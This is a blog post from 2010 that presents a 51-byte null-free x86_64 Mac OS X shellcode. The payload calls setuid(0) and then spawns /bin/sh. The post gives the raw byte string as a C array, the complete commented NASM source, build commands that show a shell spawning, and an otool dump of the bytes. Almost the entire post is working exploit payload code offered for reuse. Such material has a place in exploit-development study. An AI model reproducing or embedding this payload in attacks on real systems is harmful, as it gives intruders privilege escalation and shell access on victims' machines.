51 Byte x86_64 OS X Null Free Shellcode
It doesn’t seem like there’s a lot of x86_64 bit shellcode out there for the Intel Mac platforms so I figured I’d write my own and share it. I’m using Mac OS X 10.6.5 at the time of this post.
Instead of starting with the source and ending with the shellcode, we’re going to throw this one in reverse and get right to the shellcode. So here you have it, a 51 byte Mac OS X 64 bit setuid/shell-spawning shellcode
/* * Name: setuid_shell_x86_64 * Qualities: Null-Free * Platforms: Mac OS X / Intel x86_64 * * Created on: Nov 25, 2010 * Author: Dustin Schultz - TheXploit.com */ char shellcode = "\x41\xb0\x02\x49\xc1\xe0\x18\x49\x83\xc8\x17\x31\xff\x4c\x89\xc0" "\x0f\x05\xeb\x12\x5f\x49\x83\xc0\x24\x4c\x89\xc0\x48\x31\xd2\x52" "\x57\x48\x89\xe6\x0f\x05\xe8\xe9\xff\xff\xff\x2f\x62\x69\x6e\x2f" "\x2f\x73\x68";
And now for the source in NASM/YASM syntax. If you’ve never done system calls on 64bit OS X and you’re confused, be sure to read my post on64 bit system calls in os x.
; File: setuid_shell_x86_64.asm ; Author: Dustin Schultz - TheXploit.com BITS 64 section .text global start start: a: mov r8b, 0x02 ; Unix class system calls = 2 shl r8, 24 ; shift left 24 to the upper order bits or r8, 0x17 ; setuid = 23, or with class = 0x2000017 xor edi, edi ; zero out edi mov rax, r8 ; syscall number in rax syscall ; invoke kernel jmp short c ; jump to c b: pop rdi ; pop ret addr which = addr of /bin/sh add r8, 0x24 ; execve = 59, 0x24+r8=0x200003b mov rax, r8 ; syscall number in rax xor rdx, rdx ; zero out rdx push rdx ; null terminate rdi, pushed backwards push rdi ; push rdi = pointer to /bin/sh mov rsi, rsp ; pointer to null terminated /bin/sh string syscall ; invoke the kernel c: call b ; call b, push ret of /bin/sh db '/bin//sh' ; /bin/sh string
I would never blindly use shellcode without testing it out my self (unless it’s from a trusted source like Metasploit)
nobody@nobody:~/$ nasm -f macho64 setuid_shell_x86_64.asm nobody@nobody:~/$ ld -arch x86_64 setuid_shell_x86_64.o nobody@nobody:~/$ ./a.out sh-3.2$
And the final byte representation (verify against C source above)
nobody@nobody:~/$ otool -t setuid_shell_x86_64.o setuid_shell_x86_64.o: (__TEXT,__text) section 0000000000000000 41 b0 02 49 c1 e0 18 49 83 c8 17 31 ff 4c 89 c0 0000000000000010 0f 05 eb 12 5f 49 83 c0 24 4c 89 c0 48 31 d2 52 0000000000000020 57 48 89 e6 0f 05 e8 e9 ff ff ff 2f 62 69 6e 2f 0000000000000030 2f 73 68
And that’s all. Be sure to checkback in the future or subscribe to my RSS feed. I definitely have more shellcode to come!
This entry was posted by Dustin Schultz on November 25, 2010 at 12:49 pm, and is filed under Security Development. Follow any responses to this post through RSS 2.0. Both comments and pings are currently closed.
Comments are closed.